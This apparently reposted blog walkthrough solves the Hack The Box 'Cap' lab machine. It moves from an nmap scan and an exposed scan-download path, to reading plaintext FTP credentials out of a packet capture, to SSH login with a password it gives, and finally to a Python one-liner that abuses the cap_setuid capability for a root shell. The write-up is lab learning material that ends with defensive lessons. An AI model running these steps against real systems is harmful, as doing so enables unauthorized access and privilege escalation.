██FR█████ █INTELL███████████

Hack The Box Walkthrough: Cap (10.10.10.245)


This content originally appeared on DEV Community and was authored by tamilvanan

Note: I’m not an expert. I’m writing this blog just to document my learning journey. 🚀

Overview

Difficulty: Easy

Goal: Capture user.txt and root.txt flags

Focus Areas: PCAP analysis, FTP credential sniffing, capability-based privilege escalation

1. Reconnaissance

Nmap Scan 

nmap -A 10.10.10.245 -oN cap.nmap

Findings:

  • Port 21 (FTP): Open
  • Port 22 (SSH): Open
  • Port 80 (HTTP): Web server with a scan tool

2. Web Enumeration

Visit http://10.10.10.245 in your browser.

Observe Functionality

  • You can run a “Security Snapshot” which redirects to /data/[scan_id]
  • Example path: /data/0

Try Other Scan IDs

  • Visit /data/1, /data/2, etc.
  • Observation: You can access other users’ scans.

3. Analyze PCAP File

From one of the /data/[id] paths (likely /data/0), download a .pcap file.

  • Save it as 1.pcap

Open in Wireshark 

wireshark 1.pcap

Apply Filter

Use Wireshark filter:

ftp

Find Credentials

Look for:

USER nathan
PASS [password]

Right-click and follow the TCP stream to view the full conversation.

Suppose you find:

USER nathan
PASS [password]

4. SSH Access as Nathan

Use the FTP password to try SSH:

ssh nathan@10.10.10.245

Use the discovered password: cap@123

Get User Flag 

cat ~/user.txt

✅ User flag captured

5. Privilege Escalation

Check for SUID/Capabilities 

getcap -r / 2>/dev/null

What Does getcap Mean?

The getcap command lists Linux file capabilities, which are fine-grained permissions that can be assigned to executables.

getcap -r / 2>/dev/null
  • r /: Recursively check every file starting from root (/)
  • 2>/dev/null: Hides “Permission denied” errors to keep output clean

You’re looking for binaries with powerful capabilities like cap_setuid, which lets a program change its user ID (e.g., become root). If a binary like python3.8 has this capability, it can be abused to spawn a root shell.

These capabilities are separate from traditional SUID bits and are often overlooked.

Output Example 

/usr/bin/python3.8 = cap_setuid+ep

Explanation

This means python3.8 has the capability to change its UID — can be used to become root.

Exploit It 

/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Now check:

whoami
# root

Get Root Flag 

cat /root/root.txt

✅ Root flag captured

Summary

Step Description
Recon Nmap scan reveals FTP, SSH, HTTP
Web Enum Snapshot data exposed at /data/0
PCAP FTP creds leaked in packet capture
User Shell SSH access with FTP creds
Priv Esc Python binary with cap_setuid lets us become root

Flags

  • User Flag: Obtained from /home/nathan/user.txt
  • Root Flag: Obtained from /root/root.txt

Lessons Learned

  • PCAPs can leak sensitive data if not secured
  • FTP transmits credentials in plaintext
  • Linux capabilities can be as dangerous as SUID if misconfigured
  • Always restrict access to debug or internal diagnostic tools


This content originally appeared on DEV Community and was authored by tamilvanan